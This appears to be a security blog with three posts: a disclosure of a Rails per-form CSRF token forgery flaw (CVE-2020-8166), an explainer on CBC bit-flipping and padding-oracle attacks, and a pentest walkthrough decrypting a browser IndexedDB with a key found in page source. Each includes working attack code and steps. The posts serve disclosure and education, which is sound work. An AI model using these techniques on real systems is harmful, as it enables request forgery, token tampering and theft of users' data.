Forging CSRF Tokens in Hardened Rails Environments before 6.0.3.1 and 5.2.4.3 (CVE-2020-8166 Explained)

Ruby on Rails 6.0.3.1 and 5.2.4.3 have been released, and they include a patch for CVE-2020-8166, which we had reported via HackerOne.

The vulnerability is the “ability to forge per-form CSRF tokens given a global CSRF token”. What this means is that in hardened environments where each form is protected by its own unique CSRF token, an attacker can forge a valid per-form token if they have access to the global CSRF token.

This blog post will, for the sake of brevity and focus, assume an understanding of CSRF and why CSRF tokens are important. If you need some background, I suggest reading the OWASP and PortSwigger articles on the topic.

Rails CSRF Tokens and Per-Form CSRF Tokens

Rails provides the global CSRF token for the user session in the <HEAD> of the HTML file.

<title>Blog</title>
<meta name="csrf-param" content="authenticity_token" />
<meta name="csrf-token" content="hotX+T9rYuXWR5JNWc6A5MhMEGO8uv7H74KbvRz+WnL98caHe99MtGco8HsiyvUsE+bu1g6YMNCIuiq+0+56zQ==" />

The csrf-token is then submitted as the authenticity_token in all HTML form requests. In the default configuration, this is a global token. Consequently, if it were exposed, CSRF attacks would be possible against any endpoint in the application.

To harden the environment, developers can enable per-form CSRF tokens. This means that each individual form requires its own CSRF token. This prevents exposure of a token on any given page from being used to execute a CSRF attack against something far more serious, such as changing a password.

The per-form CSRF token is created in request_forgery_protection.rb with the per_form_csrf_token() function.

per_form_csrf_token.png

The per_form_csrf_token() function takes session, action_path, and method parameters: method is the HTTP verb used in the request, action_path is the URL route in the action attribute of the <form>, and session is a special object Rails uses to track a user’s session. The function then calls csrf_token_hmac(), passing the session object along with the action_path and method, the latter two concatenated with a “#” and downcased. If the form looks like this

<form action="articles/edit/1" method="POST">
...

then the value passed to csrf_token_hmac() might look like “articles/edit/1#post”. However, in practice, Rails forms embed a hidden <input> tag into the forms with the method, and this is the value used for the method parameter. For editing, Rails prefers to use the PATCH method, and reserves POST for creating new content. So what is passed to csrf_token_hmac() is going to look like “articles/edit/1#patch”.

The csrf_token_hmac() function processes both the session and the “action_path#method” by constructing an HMAC of the “action_path#method” string, which is called identifier.

csrf_token_hmac.png

Here the identifier is the “action_path#method” string, and the session is used to generate the secret key for the HMAC using the function real_csrf_token().

real_csrf_token.png

The real CSRF token is stored in the session like so: session[:_csrf_token]. If it does not exist already, it is generated using a Secure Random function, and stored base64 encoded. As it is binary data, the token is then base64 decoded before returning to the calling function. When called by csrf_token_hmac(), that binary token is the secret key used in the HMAC to construct the per-form CSRF token.
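To make the construction concrete, here is a minimal Python sketch of the derivation described above. It is a model of the prose, not the Rails source: the session is assumed to be a plain dict, the 32-byte secret length is inferred from the 64-byte token shown earlier, and lowercasing only the method is an assumption.

```python
import base64
import hashlib
import hmac
import secrets


def real_csrf_token(session: dict) -> bytes:
    """Return the raw session secret, creating it on first use."""
    if "_csrf_token" not in session:
        # Stored base64 encoded, as described for session[:_csrf_token].
        session["_csrf_token"] = base64.b64encode(secrets.token_bytes(32)).decode()
    return base64.b64decode(session["_csrf_token"])


def csrf_token_hmac(session: dict, identifier: str) -> bytes:
    """HMAC-SHA256 of the identifier, keyed with the session secret."""
    key = real_csrf_token(session)
    return hmac.new(key, identifier.encode(), hashlib.sha256).digest()


def per_form_csrf_token(session: dict, action_path: str, method: str) -> bytes:
    """Derive the token bound to one action path and HTTP method."""
    # Assumption: only the method needs lowercasing in this model.
    return csrf_token_hmac(session, f"{action_path}#{method.lower()}")


session = {}
token = per_form_csrf_token(session, "articles/edit/1", "PATCH")
print(len(token))  # 32 raw bytes, one SHA-256 digest
```

The important property is that the only secret input is the value returned by real_csrf_token(); the identifier is fully predictable.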

The Vulnerability

Assuming we do not know the secret key for the HMAC construction, the per-form CSRF token looks secure. We know what values are hashed, but don’t know the secret. However, this is where the vulnerability lies. If you recall the global csrf-token that is included in the <head> of the page, this token leaks the value used as the key. We can see this in the masked_authenticity_token() function.

masked_authenticity_token_annotated.png

At (1) we see that the raw_token is populated either with the value of per_form_csrf_token(), or real_csrf_token(). If the code takes the real_csrf_token() route, then raw_token contains the secret stored in session[:_csrf_token]. For generating the global CSRF token, this was found to be the case, which is why our exploit was successful. Next, a one_time_pad is generated at (2) using a Secure random number generator. This one time pad is then XOR’d with the raw_token. One time pads are considered extremely secure. However, where the security completely falls apart is at (4), where the one time pad is prepended to the encrypted CSRF token and returned, base64 encoded. This is akin to encrypting sensitive secrets each with their own key, but providing the key along with the ciphertext.
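The masking step can be sketched in a few lines of Python. This is an illustrative model of the behaviour described above, not the Rails code; the function names mask_token and unmask_token are my own.

```python
import base64
import secrets


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


def mask_token(raw_token: bytes) -> str:
    """Model of the masking: a fresh pad per response, shipped with the result."""
    one_time_pad = secrets.token_bytes(len(raw_token))
    encrypted = xor_bytes(one_time_pad, raw_token)
    # The pad is prepended to the masked token, so the "key" travels with it.
    return base64.b64encode(one_time_pad + encrypted).decode()


def unmask_token(masked_b64: str) -> bytes:
    """Anyone holding the masked token can reverse the masking."""
    blob = base64.b64decode(masked_b64)
    half = len(blob) // 2
    return xor_bytes(blob[:half], blob[half:])


raw = secrets.token_bytes(32)
first, second = mask_token(raw), mask_token(raw)
print(first != second)              # the masked value changes on every call
print(unmask_token(first) == raw)   # but the raw token is always recoverable
```

The masking makes the token look different on every response, but it was never meant to provide confidentiality, and it provides none.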

To exploit this, we must simply do the following.

  1. Get access to a global CSRF token, either through some sort of client-side code execution or, as we did when we discovered the vulnerability, by finding the global token exposed in a URL

  2. Base64 decode the token

  3. Split the token in half, separating the one time pad from the masked token

  4. XOR the two together, thereby unmasking the token

  5. Identify an endpoint that is protected by per-form CSRF tokens. Let’s say that endpoint sits at “/articles/2”, and we know that the method used is “patch”

  6. Forge the per-form token by computing an HMAC with SHA-256, where the secret key is the unmasked token and the message is “/articles/2#patch”. Take the raw binary digest rather than the hexadecimal string

  7. We know that Rails will attempt to unmask our forgery, so we need to provide our own one time pad that will not corrupt our forgery. The answer to this is simple, since anything XOR’d with zero (0) is itself. So we prepend our forgery with nulls of the correct length.

  8. Finally, prepare the encoding. First base64-encode the null one time pad followed by the forgery, then URL-encode the result.

  9. This can then be used in a CSRF attack as the authenticity_token for a form updating “/articles/2”
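The steps above can be sketched in Python as follows. This is a minimal illustration under the assumptions stated in this post (64-byte global token, HMAC-SHA256, identifier of the form “path#method”); the function names are hypothetical and the demo token is synthetic rather than taken from a real application.

```python
import base64
import hashlib
import hmac
import urllib.parse


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def unmask_global_token(global_token_b64: str) -> bytes:
    blob = base64.b64decode(global_token_b64)    # step 2: base64 decode
    half = len(blob) // 2                        # step 3: split in half
    return xor_bytes(blob[:half], blob[half:])   # step 4: XOR pad and masked token


def forge_per_form_token(global_token_b64: str, action_path: str, method: str) -> str:
    secret = unmask_global_token(global_token_b64)
    identifier = f"{action_path}#{method.lower()}".encode()
    # Step 6: raw binary digest, not the hex digest.
    forgery = hmac.new(secret, identifier, hashlib.sha256).digest()
    # Step 7: an all-zero pad leaves the forgery unchanged when the server unmasks it.
    null_pad = bytes(len(forgery))
    # Step 8: base64 encode, then URL-encode.
    encoded = base64.b64encode(null_pad + forgery).decode()
    return urllib.parse.quote(encoded, safe="")


# Synthetic global token built from a known secret, for demonstration only.
demo_secret = bytes(range(32))
demo_pad = bytes([0xAA]) * 32
demo_global = base64.b64encode(demo_pad + xor_bytes(demo_pad, demo_secret)).decode()

print(forge_per_form_token(demo_global, "/articles/2", "patch"))
```

The returned string is what would be submitted as the authenticity_token in step 9.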

The Patch

Since the vulnerability lies in the real_csrf_token() exposing the secret CSRF token through the masked_authenticity_token() function, the fix that was implemented in Rails 6.0.3.1 and 5.2.4.3 protects that token with another HMAC construction. In the patch for masked_authenticity_token() we see:

Screen Shot 2020-07-27 at 9.40.51 PM.png

real_csrf_token() has been replaced by global_csrf_token(). What this new function does is nearly identical to the per-form CSRF token generation, except the value to be hashed is a known constant.

Screen Shot 2020-07-27 at 9.41.28 PM.png

Hashing a known constant is fine because the hashed value was never the issue. It is the key that is used to create the HMAC that is now kept secret. real_csrf_token() exposed the secret, but global_csrf_token() now returns an HMAC that uses the secret, but does not reveal it. The server can now verify the validity of the global CSRF token without exposing the secret key to the browser.
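A short Python sketch shows why the exploit no longer works after the patch. The constant below is an assumed placeholder for the known constant mentioned above, and the functions take the raw secret directly rather than a Rails session.

```python
import hashlib
import hmac
import secrets

# Assumption: stands in for the known constant hashed by the patched code.
GLOBAL_IDENTIFIER = b"!real_csrf_token"


def global_csrf_token(real_token: bytes) -> bytes:
    """Patched behaviour: expose an HMAC keyed with the secret, not the secret."""
    return hmac.new(real_token, GLOBAL_IDENTIFIER, hashlib.sha256).digest()


def per_form_csrf_token(real_token: bytes, action_path: str, method: str) -> bytes:
    identifier = f"{action_path}#{method.lower()}".encode()
    return hmac.new(real_token, identifier, hashlib.sha256).digest()


real = secrets.token_bytes(32)

# What an attacker recovers by unmasking the global token after the patch.
leaked = global_csrf_token(real)

genuine = per_form_csrf_token(real, "/articles/2", "patch")
forged = per_form_csrf_token(leaked, "/articles/2", "patch")
print(forged == genuine)  # False: the leaked value is no longer the HMAC key
```

Unmasking still works exactly as before, but the value it yields is a one-way function of the secret and is useless as a key.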

Timeline

8 November 2019 - Disclosed to HackerOne

25 November 2019 - Vulnerability verified

18 May 2020 - Patch released/Bounty awarded

CBC Mode is Malleable. Don’t trust it for Authentication

On a recent pentest, I encountered an authentication system that used a block cipher in CBC mode, which I was able to break using a Padding Oracle. The vulnerability required access to valid ciphertext, which limited the scope of the attack, but it was possible to decrypt a full authentication token in about an hour even though the token was encrypted with AES-256.

Cryptography is difficult to implement securely because it is complicated and has many moving parts; if any of these components is not handled properly, the entire system can be compromised.

The problem with CBC mode is that it is malleable. Recently, researchers broke PDF encryption using CBC Gadgets to inject content into an encrypted document (https://pdf-insecurity.org/encryption/cbc-malleability.html). The notion that simply because something is encrypted it can be trusted is false. Here are some reasons why.

Bit Flipping Attacks

In CBC mode, each block of plaintext is XOR’d against the previous block of ciphertext BEFORE encryption (the first block of plaintext is XOR’d against a block known as the Initialization Vector). This makes the value that is encrypted completely dependent on the prior ciphertext block. 

During decryption the process is in reverse. A block is decrypted to an intermediate value, and then this intermediate value is XOR’d against the previous ciphertext block to return to the original plaintext. 
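Written as equations, with E_k and D_k denoting block encryption and decryption under key k, P_i and C_i the i-th plaintext and ciphertext blocks, and I_i the intermediate value (the symbols are my own shorthand for the description above):

```latex
\begin{aligned}
C_0 &= IV \\
C_i &= E_k(P_i \oplus C_{i-1}) \\
I_i &= D_k(C_i) \\
P_i &= I_i \oplus C_{i-1}
\end{aligned}
```

The last line is the one that matters for the attacks below: the plaintext depends on the previous ciphertext block only through a plain XOR.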

XOR, or Exclusive OR, is a commutative operation, much like addition. It is also its own inverse: XORing a result with one of its operands returns the other operand. For example,

a = b ⊕ c
b = a ⊕ c
c = b ⊕ a

Also, anything XOR’d against itself will become 0

0 = a ⊕ a

A ciphertext is by design a public thing. The plaintext and the key are the secrets. So in a crypto system, an attacker can see a ciphertext. 

The problem with CBC mode is that the decryption of blocks is dependent on the previous ciphertext block. This means attackers can manipulate the decryption of a block by tampering with the previous block using the commutative property of XOR.

Say an authorization token contains the following value, and it is encrypted using AES-256 in CBC mode

loggedin=0

Assume an attacker also knows the structure of this token; i.e. they know that the value of 0 is in the 10th position of the block. If the token decrypts to

loggedin=1

then the application will assume the request is authenticated. This is very easy to forge in CBC mode by manipulating the previous block.

Walking through this step by step

  1. The loggedin=0 block is decrypted to the intermediate value, but it is not yet the plaintext loggedin=0

  2. The intermediate value is XOR’d against the previous block

  3. The 0 in the 10th byte of the resulting plaintext is the result of the XOR between the 10th byte of the previous block and the 10th byte of the intermediate value, i.e.

    0 = previous_block[10] ⊕ intermediate_value[10]

In order to authenticate, an attacker needs to make the following construction true

1 = previous_block[10] ⊕ intermediate_value[10]

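This example is simple if we treat the 0 as the raw byte value 0 rather than the ASCII character, because anything XOR’d with itself is 0. So when the plaintext decrypts to 0 here, we know that

previous_block[10] == intermediate_value[10]

To get an output of 1, we simply need to chain an additional XOR. The value is easy to calculate and must be placed in the 10th byte of the attacker’s previous block. The same XOR with 1 also works when the token holds ASCII digits, since it turns the character 0 (0x30) into the character 1 (0x31).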

1 = previous_block[10] ⊕ intermediate_value[10] ⊕ 1

Under such an attack, the attacker’s previous block will decrypt to garbage, so for this to work, that garbage needs to be discarded by the application (think of tokens that are split on &, for example). If an attacker can safely get the application to ignore the garbage, then the target block would decrypt to a forged authenticated token.
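The arithmetic can be demonstrated in Python without a real cipher. In this sketch the block cipher decryption of the target block is modelled as a fixed random intermediate value, which is exactly how it appears to an attacker who cannot see the key. The token layout is hypothetical, and the flipped character sits at zero-based index 9, i.e. the 10th byte.

```python
import secrets

BLOCK = 16


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# Server side: D_k(target_block) is fixed for a given ciphertext block.
# It is modelled here as random bytes the attacker never sees.
intermediate_value = secrets.token_bytes(BLOCK)
plaintext = b"loggedin=0&x=abc"  # hypothetical 16-byte token block
previous_block = xor_bytes(intermediate_value, plaintext)  # visible to the attacker


def cbc_decrypt_target(prev: bytes) -> bytes:
    """CBC decryption of the target block given the preceding ciphertext block."""
    return xor_bytes(intermediate_value, prev)


# Attacker side: only previous_block and the token layout are known.
position = 9                  # zero-based index of the character to change
delta = ord("0") ^ ord("1")   # 0x01, the extra XOR chained onto that byte
tampered = bytearray(previous_block)
tampered[position] ^= delta

print(cbc_decrypt_target(previous_block))   # b'loggedin=0&x=abc'
print(cbc_decrypt_target(bytes(tampered)))  # b'loggedin=1&x=abc'
```

In a real attack the tampered previous block would itself decrypt to garbage, which is the caveat discussed above.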

Note, CTR mode is also vulnerable to an attack like this, but in an even more direct fashion, as previous blocks don’t need to be tampered with.

Padding Oracles

While Padding Oracles do not recover the encryption key, a ciphertext encrypted with that key can be decrypted with at most 256 guesses per byte. The vulnerability exists because block cipher modes such as CBC require the plaintext to be padded to a whole number of blocks, and encryption libraries handle the padding for developers during encryption. Consequently, during development and testing, only valid ciphertexts are used, and developers may never even be aware padding exists. This is dangerous because not handling padding errors safely can compromise the system.

So what is padding and why is it necessary?

A block cipher deals with fixed sizes of data, or blocks. In AES, the block size is 16 bytes, or 128 bits. A ciphertext block will always be 16 bytes, and so plaintext must also always be in blocks of 16 bytes. Real world scenarios don’t conform to such requirements, however. If the plaintext is 20 bytes in length, the first 16 bytes will form a block, and the remaining 4 bytes will be 12 bytes short of the 16 byte block size. Those remaining 12 bytes will get filled with padding.

The PKCS#7 standard defines how this padding is constructed, and it is quite simple. Each padding byte holds the number of padding bytes that were added. To demonstrate, here we have 13 bytes of plaintext, so we pad them with 3 bytes of \x03.

s  o  m  e  p  l  a  i  n  t  e   x   t  \x03  \x03  \x03
0  1  2  3  4  5  6  7  8  9  10  11  12  13    14    15

Padding can be anywhere from 1 to 16 bytes. A full 16 bytes of padding is added when the plaintext length is an exact multiple of the 16 byte block size. The additional block of only padding is required so that the padding can always be identified and removed unambiguously during decryption.
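A minimal Python sketch of PKCS#7 padding and its validation, using only the standard library. The function names are my own, and raising ValueError on bad padding is an illustrative choice.

```python
BLOCK_SIZE = 16


def pkcs7_pad(data: bytes, block_size: int = BLOCK_SIZE) -> bytes:
    """Append n bytes of value n, where n is between 1 and block_size."""
    n = block_size - (len(data) % block_size)
    return data + bytes([n]) * n


def pkcs7_unpad(padded: bytes, block_size: int = BLOCK_SIZE) -> bytes:
    """Validate and strip the padding, raising ValueError if it is malformed."""
    if not padded or len(padded) % block_size != 0:
        raise ValueError("input is not a whole number of blocks")
    n = padded[-1]
    if n < 1 or n > block_size or padded[-n:] != bytes([n]) * n:
        raise ValueError("invalid padding")
    return padded[:-n]


print(pkcs7_pad(b"someplaintext"))   # b'someplaintext\x03\x03\x03'
print(len(pkcs7_pad(b"A" * 16)))     # 32: a full extra block of padding
```

How the caller reacts to that ValueError is what decides whether a padding oracle exists.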

During decryption, a ciphertext is first decrypted and then the padding is validated and discarded. If the ciphertext was not tampered with, then the padding will be valid. But if the padding is invalid and the application responds with a distinguishable error, then an attacker can leverage this error as an oracle.

Using techniques similar to those in the bit flipping attack, an attacker can force a block to decrypt to one that has valid padding if the application provides information when the padding is invalid. This is because for each byte in the target block, there will be an 8-bit value in the previous block that XORs the intermediate value into valid padding. For instance, for the last byte of the block, we are looking for a padding of \x01. So a valid equation would look like this:

attackers_previous_block[15] ⊕ intermediate_value[15] = \x01

Using XOR’s commutative property, and the original previous block, we can then decrypt the last byte of the target block

intermediate_value[15] = attackers_previous_block[15] ⊕ \x01
plaintext[15] = original_previous_block[15] ⊕ intermediate_value[15]

Knowing the last byte, the attacker then repeats the process for longer padding: they set the bytes already solved so that they decrypt to the next padding value, and search for a previous block that makes the target block decrypt to a plaintext ending in \x02\x02, then \x03\x03\x03, \x04\x04\x04\x04, etc. This allows for an efficient decryption of a ciphertext without ever knowing the key, simply because the application didn’t handle an error safely.
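The whole procedure for one block can be sketched in Python. As a simplification, the server is modelled as a closure that holds the secret intermediate value of the target block and reveals only whether the padding is valid; a real attack would send each probe to the application instead. All names here are hypothetical.

```python
import secrets

BLOCK = 16


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def has_valid_padding(block: bytes) -> bool:
    n = block[-1]
    return 1 <= n <= BLOCK and block[-n:] == bytes([n]) * n


def make_oracle(intermediate: bytes):
    """Model the server: only the validity of the padding leaks."""
    def oracle(previous_block: bytes) -> bool:
        return has_valid_padding(xor_bytes(intermediate, previous_block))
    return oracle


def recover_intermediate(oracle) -> bytes:
    recovered = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        probe = bytearray(BLOCK)
        # Make the bytes already solved decrypt to the current padding value.
        for j in range(pos + 1, BLOCK):
            probe[j] = recovered[j] ^ pad
        for guess in range(256):
            probe[pos] = guess
            if not oracle(bytes(probe)):
                continue
            if pos == BLOCK - 1:
                # Rule out accidental \x02\x02 and longer paddings by
                # disturbing the neighbouring byte and asking again.
                check = bytearray(probe)
                check[pos - 1] ^= 0xFF
                if not oracle(bytes(check)):
                    continue
            recovered[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle never reported valid padding")
    return bytes(recovered)


# Demo: the attacker sees original_previous_block and can query the oracle.
original_previous_block = secrets.token_bytes(BLOCK)
secret_plaintext = b"someplaintext\x03\x03\x03"
oracle = make_oracle(xor_bytes(secret_plaintext, original_previous_block))

intermediate = recover_intermediate(oracle)
print(xor_bytes(intermediate, original_previous_block))  # b'someplaintext\x03\x03\x03'
```

Each byte costs at most 256 oracle queries, plus one confirmation query for the final byte of the block.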

Recommendations

Just because something is encrypted doesn’t make it trustworthy. To ensure the integrity of ciphertexts, authenticate them with a Message Authentication Code (MAC) that is verified before decryption, or consider using a block cipher mode that provides authentication, such as GCM. For authentication tokens, using an HMAC with SHA-256 is advisable.
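As a rough illustration of the HMAC recommendation, here is a standard-library Python sketch that appends an HMAC-SHA256 tag to a token and verifies it in constant time. The token layout (message followed by a 32-byte tag) and the function names are assumptions made for this example.

```python
import hashlib
import hmac
import secrets

MAC_LEN = 32  # size of a SHA-256 digest


def sign(key: bytes, message: bytes) -> bytes:
    """Return the message followed by its HMAC-SHA256 tag."""
    return message + hmac.new(key, message, hashlib.sha256).digest()


def verify(key: bytes, token: bytes) -> bytes:
    """Return the message if the tag is valid, otherwise raise ValueError."""
    if len(token) < MAC_LEN:
        raise ValueError("token too short")
    message, tag = token[:-MAC_LEN], token[-MAC_LEN:]
    expected = hmac.new(key, message, hashlib.sha256).digest()
    # compare_digest avoids leaking how many leading bytes matched.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("invalid MAC")
    return message


key = secrets.token_bytes(32)
token = sign(key, b"loggedin=0")
print(verify(key, token))  # b'loggedin=0'

# Flipping a single bit, as in the attacks above, is now detected.
tampered = bytearray(token)
tampered[9] ^= 0x01
try:
    verify(key, bytes(tampered))
except ValueError as error:
    print("rejected:", error)
```

The same check applies to ciphertexts: compute the tag over the IV and ciphertext, and refuse to decrypt anything whose tag does not verify.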

Decrypting IndexedDB with Javascript

IndexedDB is a NoSQL, JSON-based key-value store in the browser that allows for more capacity than basic Web Storage. While testing a web application built with Salesforce, I came across an instance of an encrypted IndexedDB and naturally wanted to know what was being stored in the browser, and if it would be of any use to my engagement.

While browsing the database using Chrome Developer tools, I noticed meta-data in the database which informed me that the Cipher was AES-CBC, and an Initialization Vector (IV) was conveniently provided with each entry. So where was the key? 

With a bit of further inspection I found the key inside the landing page’s source code. It was appropriately named key and was a javascript array of signed integers. Here is an example (generated randomly for this post):

key = [ 11,  -100,  -67,  53,  238,  63,  194,  -102,  51,  95,  142,  -21,  180,  -227,  124,  -86 ];

Unfortunately this is an array of signed integers, a format which is not suited to use as an AES key to decrypt our IndexedDB.

For those interested in following along, load this page in your browser. I used a node.js application to serve the HTML; however, this is not necessary.

<html>
<body>
<script>
key = [ 11,  -100,  -67,  53,  238,  63,  194,  -102,  51,  95,  142,  -21,  180,  -227,  124,  -86 ];
</script>
<script>

const dbName = "secrets";
var request = indexedDB.open(dbName, 2);
const customerData = [{'ciphertext': [128, 154, 180, 134, 68, 203, 39, 166, 204, 92, 101, 1, 105, 130, 152, 197, 107, 39, 213, 163, 35, 181, 52, 212, 161, 177, 214, 185, 142, 107, 127, 188, 154, 51, 36, 38, 200, 5, 64, 132, 249, 154, 90, 167, 21, 251, 158, 89, 194, 61, 209, 76, 180, 147, 253, 14, 238, 195, 180, 136, 104, 77, 19, 6, 19, 104, 210, 92, 60, 127, 4, 21, 39, 86, 37, 69, 36, 222, 182, 157, 175, 193, 194, 129, 9, 233, 131, 159, 141, 39, 151, 82, 81, 47, 41, 180, 176, 203, 41, 175, 76, 16, 177, 236, 241, 127, 62, 12, 54, 97, 55, 7, 208, 188, 173, 204, 14, 22, 217, 142, 48, 229, 120, 211, 252, 169, 152, 161, 19, 113, 209, 17, 15, 152, 27, 57, 99, 84, 49, 227, 254, 158, 103, 124, 49, 214, 116, 104, 74, 80, 78, 95, 52, 210, 175, 116, 49, 195, 174, 137], 'id': 1234, 'iv': [50, 115, 62, 11, 44, 82, 42, 69, 117, 86, 77, 66, 101, 101, 86, 11]}]

request.onerror = function(event) {
  // Handle errors.
};
request.onupgradeneeded = function(event) {
  var db = event.target.result;
  var objectStore = db.createObjectStore("customers", { keyPath: "id" });

  // Create indexes on the IV and the ciphertext. IVs may repeat, so that
  // index is not unique.
  objectStore.createIndex("iv", "iv", { unique: false });
  objectStore.createIndex("ciphertext", "ciphertext", { unique: true });

  // Use transaction oncomplete to make sure the objectStore creation is 
  // finished before adding data into it.
  objectStore.transaction.oncomplete = function(event) {
    // Store values in the newly created objectStore.
    var customerObjectStore = db.transaction("customers", "readwrite").objectStore("customers");
    customerData.forEach(function(customer) {
      customerObjectStore.add(customer);
    });
  };
};
</script>
</body>
</html>

Once loaded, you should be able to see the encrypted data in IndexedDB, structured in arrays of bytes (stored in JSON as signed ints).

indexeddb_arr_devtools.png

I set a breakpoint on the first line after the key was defined. This allowed me to work in the JS console to extract the key as a buffer of raw binary, Base64 encoded for easy handling.

key_buf = new Uint8Array(key.length);
key_buf.set(key);
binary = '';
for(var i=0;i<key_buf.length;i++) {
    binary+=String.fromCharCode(key_buf[i]);
}
window.btoa(binary);

This gives us the key in a format we can copy/paste into other scripts.

C5y9Ne4/wpozX47rtB18qg==
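For anyone who prefers to do the conversion offline, the same result can be reproduced in Python. This sketch assumes the values should wrap modulo 256, which is what assigning them into a Uint8Array does in the JavaScript above.

```python
import base64

key = [11, -100, -67, 53, 238, 63, 194, -102, 51, 95, 142, -21, 180, -227, 124, -86]

# Reduce each integer modulo 256, mirroring the Uint8Array conversion.
key_bytes = bytes(value % 256 for value in key)

encoded = base64.b64encode(key_bytes).decode()
print(encoded)  # C5y9Ne4/wpozX47rtB18qg==
```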

So now we have the key, but how can IndexedDB be decrypted using this information? 

First, I needed to dump the database. For this task I found Dexie.js to be invaluable. Modifying Dexie’s sample code, I created a function called “dumpy” which walked the entire database and for each table, would convert the ciphertext and IV to base64 and dump it to the console.

dumpy = function(databaseName) {
    var db = new Dexie(databaseName);
    // Open the database without specifying a version, so that Dexie opens
    // the existing database and reads its schema automatically.
    db.open().then(function () {
        console.log("var db = new Dexie('" + db.name + "');");
        console.log("db.version(" + db.verno + ").stores({");
        db.tables.forEach(function (table, i) {
            var primKeyAndIndexes = [table.schema.primKey].concat(table.schema.indexes);
            var schemaSyntax = primKeyAndIndexes.map(function (index) { return index.src; }).join(',');
            console.log("    " + table.name + ": " + "'" + schemaSyntax + "'" + (i < db.tables.length - 1 ? "," : ""));
            // Dump the objects stored in this table as well:
            table.each(function (object) {
                // here we convert from arrays to base64
                object.iv = arr_to_b64(object.iv);
                object.ciphertext = arr_to_b64(object.ciphertext);
                console.log(JSON.stringify(object));
            });
        });
        console.log("});\n");
    }).finally(function () {
        console.log("Finished dumping database");
        console.log("==========================");
        db.close();        
    });
}

The function is written specifically for this application and a few things are worth noting when applying this technique in other scenarios. First, since IndexedDB is an object store, we need to know the format of its objects, which is easy to learn by browsing the database in Developer Tools. In this situation, each object has a ciphertext and iv attribute. Simple enough.

I converted the ciphertext and iv from arrays of signed integers into binary, and then base64 encoded them. For this conversion I used the following function:

function arr_to_b64(arr) {
    var binary = '';
    var bytes = new Uint8Array( arr );
    var len = bytes.byteLength;
    for(var i=0;i<len;i++) {
      binary+=String.fromCharCode(bytes[i]);
    }
  return window.btoa(binary);
}

Then in the table.each() loop within dumpy, I called arr_to_b64 on both object.iv and object.ciphertext.

Running dumpy first needs Dexie.js to be available, so I ran the following from the console:

script = document.createElement("script")
script.onload = function() {console.log("Script ready")}
script.src = "https://unpkg.com/dexie/dist/dexie.js";
document.getElementsByTagName("head")[0].appendChild(script)

Once the console outputs “Script ready”, Dexie has been loaded.

Then we run our function dumpy and provide the database name:

dumpy("secrets")
indexeddb_dumpy.png

So now we’ve dumped both the IV and ciphertexts for each item in the database. We can copy that offline for decryption using Python:

import base64
from Crypto.Cipher import AES  # provided by the PyCryptodome package

# Key recovered from the page source, base64 encoded
key = base64.b64decode('C5y9Ne4/wpozX47rtB18qg==')

# Ciphertext and IV dumped from IndexedDB
ct = base64.b64decode('gJq0hkTLJ6bMXGUBaYKYxWsn1aMjtTTUobHWuY5rf7yaMyQmyAVAhPmaWqcV+55Zwj3RTLST/Q7uw7SIaE0TBhNo0lw8fwQVJ1YlRSTetp2vwcKBCemDn40nl1JRLym0sMspr0wQsezxfz4MNmE3B9C8rcwOFtmOMOV40/ypmKETcdERD5gbOWNUMeP+nmd8MdZ0aEpQTl800q90McOuiQ==')
iv = base64.b64decode('MnM+CyxSKkV1Vk1CZWVWCw==')

cipher = AES.new(key, AES.MODE_CBC, iv=iv)

pt = cipher.decrypt(ct)
print(pt)

Note this code doesn’t handle any padding, so there will be some garbage bytes at the end. But the value in IndexedDB now decrypts to:

[{"age": 35, "ssn": "444-44-4444", "name": "Bill", "email": "bill@company.com"}, {"age": 32, "ssn": "555-55-5555", "name": "Donna", "email": "donna@home.org"}]